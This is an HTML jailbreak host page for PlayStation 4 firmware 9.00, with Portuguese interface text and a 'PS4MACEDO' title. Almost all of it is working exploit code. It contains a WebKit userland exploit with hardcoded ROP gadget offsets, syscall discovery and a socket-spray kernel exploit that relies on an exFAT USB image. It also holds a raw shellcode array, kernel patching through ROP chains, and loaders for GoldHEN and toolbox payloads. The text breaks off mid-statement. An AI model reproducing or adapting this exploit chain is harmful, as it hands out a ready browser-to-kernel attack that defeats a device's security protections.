index.html

<html manifest="manifest.cache"><head><style>body{background-image: url('data:image/png;base64,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');background-color:#000024;background-attachment:fixed;background-size:100%;background-repeat:no-repeat;font-family:system-ui;text-align:center}button:-moz-focus-inner, button:focus{outline:0;border:none}button{font-family:arial;font-size:20px;text-transform:uppercase;font-weight:700;border:2px solid #404040;border-radius:4px;padding:10px;cursor:pointer;display:inline-block;text-decoration:none;background:0 0;color:#d4d7d8;box-shadow:0 5px 0 #878787} button:hover{font-size:20px;background:#000064;border:2px solid #fff;box-shadow:0 5px 0 #ccc;color:#fff} button:active{background:#ee596f;position:relative;color:#000;top:5px;box-shadow:none}</style><meta charset="utf-8"><title>PS4MACEDO 9.00 PEN DRIVE (GOLDHEN V2.3B2 + ORBIS-TOLLBOX)</title><script>window.applicationCache.onprogress=function(e){document.getElementById("progress").innerHTML='Instalando Cache Offline: <font color="#ee596f">'+Math.round(e.loaded/e.total*100)+"%</font>"},window.applicationCache.oncached=function(){document.getElementById("progress").innerHTML='Cache <font color="#ee596f">instalada</font> com sucesso!!!',setTimeout(function(){document.getElementById("progress").innerHTML='Processo de download da cache para utilizar o <font color="#ee596f">host offline</font>',document.getElementById("progress").innerHTML='Saia, <font color="#ee596f">desabilite a rede</font> e retorne ao navegador.'},1500),localStorage.cachedL="yes"},window.applicationCache.onnoupdate=function(){localStorage.cachedL="yes"},window.applicationCache.onerror=function(){localStorage.cachedL="yes"};</script><script>function load_poc(){var e=new XMLHttpRequest;e.responseType="arraybuffer",e.open("GET",PLfile),e.send(),e.onreadystatechange=function(){if(4==e.readyState){PLD=e.response;var n=chain.syscall(477,0,4*PLD.byteLength,7,4098,-1,0),t=p.array_from_address(n,4*PLD.byteLength),o=new Uint8Array(4-e.response.byteLength%4%4),s=new Uint8Array(e.response.byteLength+o.byteLength);s.set(new Uint8Array(e.response),0),s.set(o,e.response.byteLength);var a=new Uint32Array(s.buffer);t.set(a,0);var r=p.malloc(16);chain.call(libKernelBase.add32(OFFSET_lk_pthread_create),r,0,n,0),allset()}}}function jbdone(){setTimeout(goldhen,500),setTimeout(toolbox,3500)}function allset(){window.progress.innerHTML=LoadedMSG}function goldhen(){PLfile="goldhen.bin",load_poc()}function toolbox(){LoadedMSG="TUDO PRONTO!!!",PLfile="toolbox.bin",load_poc()}</script></head>

<body onload="if(localStorage.cachedL=='yes')setTimeout(poc,50);"><br><br><br><h1><center><font style='color:#fff;font-size:46px;font-weight:bold;margin:0 0 0 0.0;text-shadow:3px 2px #ff5757;'><i>PS4MACEDO JAILBREAK FW V9.00</i></font></center></h1><div><center><font style='color:#fff;font-size:26px;font-weight:bold;margin:0 0 0 0.0;text-shadow:3px 2px #ff5757;'><i>(PEN DRIVE - GOLDHEN V2.3B2 + ORBIS-TOLLBOX)</i></font></center></div><br><br><br><br><br><hr width="65%" size="1" color="#ff5757"><div id=progress style=font-size:31px;text-align:center;color:#fff>Preparando o desbloqueio. Por favor, <font color="#ee596f">AGUARDE!!!</font></div><hr width="65%" size="1" color="#ff5757"><br><br><br><br><br><br><br><font style='color:#fff;font-size:19px;'>Este host funciona em off-line</font><div style='text-align:left;position:fixed;left:10px;bottom:10px;width:100%;font-size:22px;color:#fff'>Agradecimento Especial: <font color=#6089f6>TheFloW-SpecterDev-ChendoChap-Znullptr-Sleirsgoevy-SiSTRo-e todos que contribuíram com a cena.</font></div>

<script>
const OFFSET_wk_vtable_first_element=17101072,OFFSET_WK_memset_import=680,OFFSET_WK___stack_chk_fail_import=376,OFFSET_WK_psl_builtin_import=3432,OFFSET_WKR_psl_builtin=211872,OFFSET_WK_setjmp_gadget_one=17214711,OFFSET_WK_setjmp_gadget_two=32301523,OFFSET_WK_longjmp_gadget_one=17214711,OFFSET_WK_longjmp_gadget_two=32301523,OFFSET_libcint_memset=325648,OFFSET_libcint_setjmp=767420,OFFSET_libcint_longjmp=767510,OFFSET_WK2_TLS_IMAGE=59670560,OFFSET_lk___stack_chk_fail=130912,OFFSET_lk_pthread_create=152848,OFFSET_lk_pthread_join=44960;var chain,kchain,kchain2,SAVED_KERNEL_STACK_PTR,KERNEL_BASE_PTR,webKitBase,webKitRequirementBase,libSceLibcInternalBase,libKernelBase,textArea=document.createElement("textarea"),nogc=[],syscalls={},gadgets={},wk_gadgetmap={ret:50,"pop rdi":3249808,"pop rsi":128214,"pop rdx":39020,"pop rcx":415671,"pop r8":11512433,"pop r9":4334961,"pop rax":334354,"pop rsp":320147,"mov [rdi], rsi":27883808,"mov [rdi], rax":17271031,"mov [rdi], eax":10052796,"cli ; pop rax":354040,sti:2079692,"mov rax, [rax]":147916,"mov rax, [rsi]":5310112,"mov [rax], rsi":32495760,"mov [rax], rdx":21129858,"mov [rax], edx":3899364,"add rax, rsi":24131966,"mov rdx, rax":5502209,"add rax, rcx":195533,"mov rsp, rdi":33849442,"mov rdi, [rax + 8] ; call [rax]":7675623,infloop:32255,"mov [rax], cl":814767},wkr_gadgetmap={"xchg rdi, rsp ; call [rsi - 0x79]":1930480},wk2_gadgetmap={"mov [rax], rdi":1048023,"mov [rax], rcx":2924234,"mov [rax], cx":22707538},hmd_gadgetmap={"add [r8], r12":179425},ipmi_gadgetmap={"mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]":13387};function run_hax(){userland(),0!=chain.syscall(23,0).low?kernel():window.progress.innerHTML="Cargas já <font color=\"#ee596f\">ATIVADAS</font>!"}function int64(a,i){return this.low=a>>>0,this.hi=i>>>0,this.add32inplace=function(a){var i=((this.low>>>0)+a&4294967295)>>>0,r=this.hi>>>0;i<this.low&&r++,this.hi=r,this.low=i},this.add32=function(a){var i=((this.low>>>0)+a&4294967295)>>>0,r=this.hi>>>0;return i<this.low&&r++,new int64(i,r)},this.sub32=function(a){var i=((this.low>>>0)-a&4294967295)>>>0,r=this.hi>>>0;return i>this.low&4294967295&&r--,new int64(i,r)},this.sub32inplace=function(a){var i=((this.low>>>0)-a&4294967295)>>>0,r=this.hi>>>0;i>this.low&4294967295&&r--,this.hi=r,this.low=i},this.and32=function(a){return new int64(this.low&a,this.hi)},this.and64=function(a,i){return new int64(this.low&a,this.hi&i)},this.toString=function(a){var i,r,t=(this.low>>>0).toString(16),e=(this.hi>>>0).toString(16);return 0==this.hi?t:(r=8,e+(t=(r-=(i=t).toString().length)>0?new Array(r+(/\./.test(i)?2:1)).join("0")+i:i+""))},this}function userland(){p.launch_chain=function(r){r.push(window.gadgets["pop rdi"]),r.push(s),r.push(libSceLibcInternalBase.add32(OFFSET_libcint_longjmp)),p.write8(a,e),textArea.scrollLeft=0,p.write8(h.add32(0),window.gadgets.ret),p.write8(h.add32(16),r.stack),p.write8(h.add32(64),p.read8(s.add32(64))),p.write8(a,n),textArea.scrollLeft=0,p.write8(a,i)},p.malloc=function(a){var i=new Uint8Array(65536+a);window.nogc.push(i);var r=p.read8(p.leakval(i).add32(16));return r.backing=i,r},p.malloc32=function(a){var i=new Uint8Array(65536+4*a);window.nogc.push(i);var r=p.read8(p.leakval(i).add32(16));return r.backing=new Uint32Array(i.buffer),r},p.stringify=function(a){for(var i=new Uint8Array(a.length+1),r=0;r<a.length;r++)i[r]=255&a.charCodeAt(r);return window.nogc.push(i),p.read8(p.leakval(i).add32(16))},p.array_from_address=function(a,i){var r=new Uint32Array(4096),t=p.leakval(r).add32(16);return p.write8(t,a),p.write4(t.add32(8),i),p.write4(t.add32(12),1),nogc.push(r),r},p.readstr=function(a){for(var i="",r=0;;r++){var t=p.read1(a.add32(r));if(0==t)break;i+=String.fromCharCode(t)}return i};var a=p.read8(p.leakval(textArea).add32(24)),i=p.read8(a);for(var r in webKitBase=p.read8(i).sub32(OFFSET_wk_vtable_first_element),(libSceLibcInternalBase=p.read8(t(webKitBase.add32(OFFSET_WK_memset_import)))).sub32inplace(OFFSET_libcint_memset),(libKernelBase=p.read8(t(webKitBase.add32(OFFSET_WK___stack_chk_fail_import)))).sub32inplace(OFFSET_lk___stack_chk_fail),(webKitRequirementBase=p.read8(t(webKitBase.add32(OFFSET_WK_psl_builtin_import)))).sub32inplace(OFFSET_WKR_psl_builtin),wk_gadgetmap)window.gadgets[r]=webKitBase.add32(wk_gadgetmap[r]);for(var r in wkr_gadgetmap)window.gadgets[r]=webKitRequirementBase.add32(wkr_gadgetmap[r]);function t(a){var i=65535&p.read4(a),r=p.read4(a.add32(2));return 9727!=i?0:a.add32(6+r)}var e=p.malloc32(512),n=p.malloc32(512),s=p.malloc32(64),h=p.malloc32(64);p.write8(e.add32(0),e),p.write8(e.add32(168),webKitBase.add32(OFFSET_WK_setjmp_gadget_two)),p.write8(e.add32(16),s),p.write8(e.add32(8),libSceLibcInternalBase.add32(OFFSET_libcint_setjmp)),p.write8(e.add32(456),webKitBase.add32(OFFSET_WK_setjmp_gadget_one)),p.write8(n.add32(0),n),p.write8(n.add32(168),webKitBase.add32(OFFSET_WK_longjmp_gadget_two)),p.write8(n.add32(16),h),p.write8(n.add32(8),libSceLibcInternalBase.add32(OFFSET_libcint_longjmp)),p.write8(n.add32(456),webKitBase.add32(OFFSET_WK_longjmp_gadget_one));var o,c=new Uint8Array(4096),d=p.leakval(c).add32(16),l=p.read8(d);p.write8(d,window.libKernelBase),p.write4(d.add32(8),262144);for(var u=0;u<262144;u++)if(114==c[u]&&100==c[u+1]&&108==c[u+2]&&111==c[u+3]&&99==c[u+4]){o=u;break}p.write4(d.add32(8),o+32);var _=new Uint32Array(1),w=new Uint8Array(_.buffer);for(u=0;u<o;u++)if(72==c[u]&&199==c[u+1]&&192==c[u+2]&&73==c[u+7]&&137==c[u+8]&&202==c[u+9]&&15==c[u+10]&&5==c[u+11]){w[0]=c[u+3],w[1]=c[u+4],w[2]=c[u+5],w[3]=c[u+6];var g=_[0];window.syscalls[g]=window.libKernelBase.add32(u)}if(p.write8(d,l),0==(chain=new rop).syscall(20).low)for(alert("Webkit Exploit Failed. Try Again.");;);}function kernel(){var a,i,r;function t(t){var e=chain.syscall(594,p.stringify(`/${i}/common/lib/${t}`),0,a,0);0!=e.low&&alert("failed to load prx/get handle "+t),p.write8(r,424),0!=(e=chain.syscall(608,p.read4(a),0,r)).low&&alert("failed to get module info from handle");var n=p.read8(r.add32(272));return 0!=p.read4(r.add32(284))&&("libSceWebKit2.sprx"==t?n.sub32inplace(OFFSET_WK2_TLS_IMAGE):alert(`${t}, tlssize is non zero. this usually indicates that this module has a tls phdr with real data. You can hardcode the imgage to base offset here if you really wish to use one of these.`)),n}var e=function(){for(var a=p.malloc(1728),i=0;i<432;i++)chain.fcall(window.syscalls[362]),chain.write_result4(a.add32(4*i));chain.run();var r=p.array_from_address(a,432),t=chain.syscall(97,2,1,0);if(t.low<256||t.low>=512)for(alert("invalid socket");;);var e=p.malloc(32);p.write8(e.add32(0),t),p.write4(e.add32(8),131071),p.write4(e.add32(12),0),p.write8(e.add32(16),0),p.write8(e.add32(24),0);for(i=0;i<432;i++)chain.fcall(window.syscalls[363],r[i],e,1,0,0,0);chain.run();for(i=18;i<432;i+=2)chain.fcall(window.syscalls[6],r[i]);chain.run(),alert("\n\nQuase pronto!!! Agora siga os passos abaixo para concluir o desbloqueio:\n\n1. Insira o USB com o arquivo exfathax_pico.img (pOOBs4). \n2. Após a notificação \"...USB é incompatível\", clique em OK.");for(i=1;i<432;i+=2)chain.fcall(window.syscalls[6],r[i]);if(chain.run(),0==chain.syscall(23,0).low){chain.fcall(window.syscalls[73],16384,49152),chain.fcall(window.syscalls[325]),chain.run();var n=chain.syscall(477,0,16384,7,4096,4294967295,0),s=p.array_from_address(n,4096),h=[3e3,4270409728,54365512,251658240,1213580037,2336810377,2515011710,3892314112,373,53876223,2336751616,210749,1066092544,1962902856,1032669419,669,4181035848,1207959554,52565387,2336751616,14084114,2370306048,171837,898320384,740,85297992,1207959555,3118994059,1207959552,40058253,2336751616,180021,361449472,712,3893529416,156,2050854216,1207959554,44709259,2336751616,174869,311117824,32744,25552896,3277651968,1832749384,1207959554,40779009,21495808,159549,1023494144,624,1899823432,1207959554,41041153,21495808,168765,1023494144,660,1698496840,1207959554,40254721,21495808,165693,1023494144,648,2302476616,1207959554,42614017,21495808,166717,1023494144,588,1027408200,3271557122,3850979413,283935560,607422792,609519944,3977641736,1207959553,1265942661,1220708680,1212170379,796180613,678988616,607927112,2336754292,3229960192,3974831476,410553160,1962902856,2139834605,2084259856,3799320612,4279255239,1224736767,823163533,835858934,2769682377,1207959553,1561379971,2303219139,3223326693,4294911304,571473918,1032538304,456,2425358279,1204261008,1217433604,898320568,428,142051656,1695565767,3342633800,2430023,1204224e3,2303197208,474466104,3091763344,2100661064,1207959553,3340793737,3343394887,1204224256,44,2005747945,361449524,336,2314348872,2336763991,92981,1452099584,3609806853,3242786697,2168981735,59855,1049184256,3400,571408385,1438866880,266701128,625524768,4294901759,1220551183,20594059,130482176,12828721,893225800,3338665985,3284152583,1032538112,304,3224438727,2336751811,76605,822593280,1208009664,10894731,2277965824,2039297,2425419313,503678919,3375431711,2278002832,2039305,2425410097,507414471,3375431711,222859408,65536,4290781711,61205,3223326464,4294911304,571473918,1032538304,220,3224438727,222822595,65536,1572872719,1937339331,1601004916,1886614899,1600417381,1935763568,1885287013,1935631730,6516345,1953724787,1918856549,1836413797,1752194917,845509473,1937339136,1601004916,1970496882,1885300077,1702060392,2425356339,0,0,1018096,0,3076464,0,101872,0,102128,0,40190224,0,619056,0,4206176,0,22151432,0,22151424,0,4599072,0,4599292,0,6445472,0,6449360,0,6446528,0,6447760,0,6448928,0];for(i=0;i<h.length;i++)s[i]=h[i];chain.fcall(window.syscalls[203],n,16384),chain.fcall(n,p.read8(KERNEL_BASE_PTR)),chain.fcall(window.syscalls[73],n,16384),chain.run(),alert("Na tentativa de evitar erros, remova o USB agora e clique em OK.");window.progress.innerHTML="Carregando o <font color=\"#ee596f\">Goldhen v2.3b2 + Orbis Tollbox</font>...",setTimeout(jbdone,50)}else alert("failed to trigger exploit kernel heap might be corrupted, try again or reboot the console"),p.write8(0,0)};!function(){var e=(a=p.malloc(488)).add32(4),n=a.add32(20);r=n.add32(64),p.write8(e,44),chain.syscall(602,0,n,e),i=p.readstr(n);var s=t("libSceIpmi.sprx"),h=t("libSceHmd.sprx"),o=t("libSceWebKit2.sprx");for(var c in hmd_gadgetmap)window.gadgets[c]=h.add32(hmd_gadgetmap[c]);for(var c in wk2_gadgetmap)window.gadgets[c]=o.add32(wk2_gadgetmap[c]);for(var c in ipmi_gadgetmap)window.gadgets[c]=s.add32(ipmi_gadgetmap[c]);for(var c in window.gadgets)p.read8(window.gadgets[c]),chain.fcall(window.syscalls[203],window.gadgets[c],16);chain.run()}(),function(){SAVED_KERNEL_STACK_PTR=p.malloc(512),KERNEL_BASE_PTR=SAVED_KERNEL_STACK_PTR.add32(8),p.write8(KERNEL_BASE_PTR,new int64(4286636900,4294967295)),kchain=new rop,kchain2=new rop,chain.fcall(window.syscalls[203],kchain.stackback,262144),chain.fcall(window.syscalls[203],kchain2.stackback,262144),chain.fcall(window.syscalls[203],SAVED_KERNEL_STACK_PTR,16),chain.run(),kchain.count=0,kchain2.count=0,kchain.set_kernel_var(KERNEL_BASE_PTR),kchain2.set_kernel_var(KERNEL_BASE_PTR),kchain.push(gadgets["pop rax"]),kchain.push(SAVED_KERNEL_STACK_PTR),kchain.push(gadgets["mov [rax], rdi"]),kchain.push(gadgets["pop r8"]),kchain.push(KERNEL_BASE_PTR),kchain.push(gadgets["add [r8], r12"]),kchain.kwrite1(28478968,1),kchain.push(gadgets.sti);var a=kchain.write_kernel_addr_to_chain_later(3222592),i=kchain.write_kernel_addr_to_chain_later(2079049);kchain.push(gadgets["pop rdi"]),kchain.push(6),kchain.push(gadgets["pop rsi"]),kchain.push(gadgets["mov rsp, rdi"]),kchain.push(gadgets["pop rdx"]),kchain.push(14),kchain.push(gadgets["pop rcx"]),kchain.push(0),kchain.push(gadgets["pop r8"]),kchain.push(0);var r=kchain.get_rsp();kchain.pushSymbolic(),kchain.push(gadgets["pop rsi"]),kchain.push(2147745843),kchain.push(gadgets["pop rdi"]),kchain.push(kchain2.stack);var t=kchain.get_rsp();kchain.pushSymbolic(),kchain.finalizeSymbolic(a,r),kchain.finalizeSymbolic(i,t),kchain2.kwrite2(6449268,37008),kchain2.kwrite1(2765,235),kchain2.kwrite1(2561021,235),kchain2.kwrite1(2561089,235),kchain2.kwrite1(2561213,235),kchain2.kwrite1(2561281,235),kchain2.kwrite1(2561709,235),kchain2.kwrite1(2562909,235),kchain2.kwrite1(2563117,235),kchain2.kwrite1(28478968,0);var e=kchain2.write_kernel_addr_to_chain_later(1561856),n=kchain2.write_kernel_addr_to_chain_later(3222592);kchain2.push(gadgets["pop rdi"]),kchain2.push(6),kchain2.push(gadgets["pop rsi"]);var s=kchain2.get_rsp();kchain2.pushSymbolic(),kchain2.push(gadgets["pop rdx"]),kchain2.push(14),kchain2.push(gadgets["pop rcx"]),kchain2.push(0),kchain2.push(gadgets["pop r8"]),kchain2.push(0);var h=kchain2.get_rsp();kchain2.pushSymbolic(),kchain2.finalizeSymbolic(e,s),kchain2.finalizeSymbolic(n,h),kchain2.kwrite4(1168,0),kchain2.kwrite1(1218,235),kchain2.kwrite2(1209,37008),kchain2.kwrite2(1205,37008),kchain2.kwrite1(6662,235),kchain2.kwrite4(527245,0),kchain2.kwrite2(2338500,59792),kchain2.kwrite1(2340479,235),kchain2.kwrite4(2235200,3284152648),kchain2.kwrite1(1467178,55),kchain2.kwrite1(1467181,55),kchain2.kwrite4(17827104,2),kchain2.kwrite8_kaddr(17827112,313261),kchain2.kwrite4(17827148,1),kchain2.kwrite4(3857979,3284607503);var o=kchain2.write_kernel_addr_to_chain_later(3857979);kchain2.push(gadgets["pop rdi"]),kchain2.push(2147811379);var c=kchain2.get_rsp();kchain2.pushSymbolic(),kchain2.finalizeSymbolic(o,c),kchain2.rax_kernel(3770769),kchain2.push(gadgets["mov rdx, rax"]),kchain2.push(gadgets["pop rsi"]),kchain2.push(SAVED_KERNEL_STACK_PTR),kchain2.push(gadgets["mov rax, [rsi]"]),kchain2.push(gadgets["pop rcx"]),kchain2.push(16),kchain2.push(gadgets["add rax, rcx"]),kchain2.push(gadgets["mov [rax], rdx"]),kchain2.push(gadgets["pop rdi"]);var d=kchain2.pushSymbolic();kchain2.push(gadgets["mov [rdi], rax"]),kchain2.push(gadgets.sti),kchain2.push(gadgets["pop rsp"]);var l=kchain2.get_rsp();kchain2.pushSymbolic(),kchain2.finalizeSymbolic(d,l)}(),function(){var a=chain.syscall(477,16384,49152,3,4112,4294967295,0),i=a.add32(16384),r=a.add32(32768);if(16384!=a.low)for(alert("enomem: "+a);;);p.write8(a,r),p.write8(a.add32(104),i),p.write8(i.sub32(121),gadgets["cli ; pop rax"]),p.write8(i.add32(0),gadgets["xchg rdi, rsp ; call [rsi - 